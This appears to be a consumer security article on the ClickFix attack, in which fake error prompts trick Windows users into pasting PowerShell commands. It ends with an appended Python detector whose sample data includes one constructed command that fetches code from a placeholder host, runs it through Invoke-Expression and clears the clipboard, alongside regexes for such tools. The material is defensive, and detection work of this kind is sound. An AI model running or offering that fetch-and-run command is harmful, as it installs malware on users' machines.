Do Not Click—If You See This On Your PC It’s An Attack

Posted by Zak Doffman, Contributor | 3 weeks ago


There’s a new type of attack targeting Windows PCs. Such is its power and growing popularity that a new report warns it’s even being picked up by nation state hackers in Russia, Iran and North Korea. But while those threat groups experiment with the technique, its main use is still by the cyber criminals targeting your PC, your passwords and your money. Here’s what you need to look out for — and what you need to do.


As warnings go, this one will be straightforward. Once you know the basis of this attack, you should be safe. It’s not complicated and it’s not easily forgotten. We’re talking ClickFix, which ProofPoint says has become increasingly popular “in cybercrime over the last year as well as in espionage campaigns in recent months, suggesting the technique will likely become more widely tested or adopted by state-sponsored actors.”


ClickFix was first seen last year, and works by using social engineering lures and fake error messages to trick users into copying, pasting and then running a malicious command in the PowerShell terminal on their PC. That pasted command is what executes the attack: it reaches out to a remote server, fetches a second command or script from it and runs that, which ultimately installs malware on the PC. What happens next depends on the objectives of the attack.

McAfee explains that ClickFix is “a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.”

If you click, you’ll end up with a RAT or infostealer like Lumma Stealer or DarkGate on your PC. While early ClickFix lures focused on errors and scareware, it also now tricks users into registering PCs to open secure documents or websites. Whatever the lure, the underlying attack is the same. And it all looks the same — so once you know, you know.

As for those state hackers, “multiple examples of state-sponsored actors using ClickFix have shown not only the technique’s popularity among state actors, but also its use by various countries within weeks of one another.” ProofPoint says “in most cases, the groups returned to standard campaigns after their ClickFix campaigns.” Most people reading this will (luckily) not be targeted by Russian, Iranian or North Korean state actors, but they will be targeted by cybercriminals.

Each ClickFix attack has four components, which will be set out as user instructions. There are variations in wording and presentation, but it’s all essentially the same:

  1. Copy the script
  2. Open the terminal to run the script
  3. Paste the copied text
  4. Execute by pressing “enter” or clicking “ok”


And without wishing to oversimplify this, that’s what you look out for. If any error message, PC registration, secure document login or anything else you can think of asks you to carry out those steps, it’s an attack and you need to exit the app or website or message, and likely reboot your PC for good measure.


As McAfee warns, “once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various kinds of malware.”
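As an added illustration (not code from this article, nor from Proofpoint or McAfee), here is a small detection that scores Windows process-creation records for the behaviours the four-step pattern and the McAfee quote above describe: PowerShell started from the user’s desktop session, content fetched from a remote host and then executed, a minimized or hidden window, and the clipboard being cleared. The records, field names and the example.invalid host are constructed for the example rather than taken from any product’s telemetry.

```python
import re

# Constructed sample process-creation records (not real telemetry). The second one is
# shaped like the paste-and-run the article describes; the host is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": ('powershell.exe -w minimized -c "Invoke-WebRequest http://example.invalid/p '
                 "| Invoke-Expression; Set-Clipboard -Value ''\"")},
    {"parent": r"C:\Program Files\Build\ci-agent.exe", "image": PS,
     "cmdline": r"powershell.exe -File C:\build\deploy.ps1"},
]

# Each behaviour the article attributes to ClickFix, as a regex over the command line.
SIGNALS = {
    "downloads remote content": r"invoke-webrequest|\biwr\b|downloadstring|net\.webclient|invoke-restmethod",
    "executes fetched or encoded content": r"invoke-expression|\biex\b|-encodedcommand|-enc\b",
    "runs minimized or hidden": r"-(w|windowstyle)\s+(minimized|hidden)",
    "clears or overwrites clipboard": r"set-clipboard|clip\.exe|\|\s*clip\b",
}

def score_event(ev):
    """Return (score, reasons) for one process-creation record; each matched signal adds one."""
    cmd = ev["cmdline"].lower()
    reasons = []
    # A user pasting into a terminal opened from the desktop shows up as PowerShell under explorer.exe.
    if ev["parent"].lower().endswith("explorer.exe") and ev["image"].lower().endswith("powershell.exe"):
        reasons.append("powershell started from explorer.exe (interactive paste)")
    for label, pattern in SIGNALS.items():
        if re.search(pattern, cmd):
            reasons.append(label)
    return len(reasons), reasons

def flag_clickfix(events, threshold=3):
    """Flag records that combine several signals; any one alone (an admin's iwr, say) is too noisy."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["cmdline"], reasons))
    return hits

if __name__ == "__main__":
    for cmdline, reasons in flag_clickfix(SAMPLE_EVENTS):
        print("SUSPECT:", cmdline)
        for r in reasons:
            print("  -", r)
```

Only the constructed ClickFix-shaped record crosses the threshold; the routine admin command and the CI agent’s script run do not.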
